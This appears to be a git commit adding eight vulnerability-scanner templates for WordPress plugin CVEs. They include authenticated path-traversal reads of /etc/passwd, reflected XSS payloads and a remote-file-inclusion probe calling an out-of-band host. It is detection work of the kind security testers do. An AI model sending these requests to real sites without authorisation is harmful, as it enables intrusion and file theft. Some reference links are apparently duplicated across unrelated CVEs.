add some wp plugins cves

patch-1
cckuailong 2022-02-08 09:07:19 +08:00
parent 56160908f0
commit f29d2b20df
8 changed files with 347 additions and 0 deletions

View File

@ -0,0 +1,42 @@
id: CVE-2020-35749
info:
name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download
author: cckuailong
severity: high
description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack.
reference:
- https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
- https://nvd.nist.gov/vuln/detail/CVE-2020-35749
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.7
cve-id: CVE-2020-35749
cwe-id: CWE-22
tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,45 @@
id: CVE-2021-24300
info:
name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS
author: cckuailong
severity: medium
description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue.
reference:
- https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837
- https://nvd.nist.gov/vuln/detail/CVE-2021-24300
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24300
cwe-id: CWE-79
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%281%29%3B%2F%2F HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onmouseover=alert(1)"
- "PickPlugins Product Slider"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,45 @@
id: CVE-2021-24488
info:
name: WordPress Plugin Post Grid < 2.1.8 - XSS
author: cckuailong
severity: medium
description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
reference:
- https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
- https://nvd.nist.gov/vuln/detail/CVE-2021-24488
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24488
cwe-id: CWE-79
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "><script>alert(1)</script>"
- "Post Grid Settings"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,43 @@
id: CVE-2021-24926
info:
name: WordPress Plugin Domain Check < 1.0.17 - XSS
author: cckuailong
severity: medium
description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue.
reference:
- https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733
- https://nvd.nist.gov/vuln/detail/CVE-2021-24926
classification:
cve-id: CVE-2021-24926
cwe-id: CWE-79
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=domain-check-profile&domain=hacked.foo<script>alert(1)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(1)</script>"
- "Domain Check"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,40 @@
id: CVE-2021-24947
info:
name: RVM - Responsive Vector Maps < 6.4.2 - Arbitrary File Read
author: cckuailong
severity: high
description: The plugin does not have proper authorisation, CSRF checks and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user, such as subscriber, to read arbitrary files on the web server.
reference:
- https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
- https://nvd.nist.gov/vuln/detail/CVE-2021-24947
classification:
cve-id: CVE-2021-24947
cwe-id: CWE-23
tags: cve,cve2021,arbitrary-file-read,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,45 @@
id: CVE-2021-24991
info:
name: The WooCommerce PDF Invoices & Packing Slips WordPress plugin < 2.10.5 - XSS
author: cckuailong
severity: medium
description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard.
reference:
- https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
- https://nvd.nist.gov/vuln/detail/CVE-2021-24991
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2021-24991
cwe-id: CWE-79
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x"
- "WooCommerce PDF Invoices"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,45 @@
id: CVE-2021-25008
info:
name: The Code Snippets WordPress plugin < 2.14.3 - XSS
author: cckuailong
severity: medium
description: The Code Snippets WordPress plugin before 2.14.3 does not escape the snippets-safe-mode parameter before outputting it back in attributes, leading to a Reflected Cross-Site Scripting issue.
reference:
- https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
- https://nvd.nist.gov/vuln/detail/CVE-2021-25008
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-25008
cwe-id: CWE-79
tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x"
- "Snippets"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,42 @@
id: CVE-2021-25052
info:
name: he Button Generator WordPress plugin < 2.3.3 - RFI
author: cckuailong
severity: high
description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
reference:
- https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a
- https://nvd.nist.gov/vuln/detail/CVE-2021-25052
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-25052
cwe-id: CWE-352
tags: cve,cve2021,rfi,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: interactsh_protocol
words:
- "dns"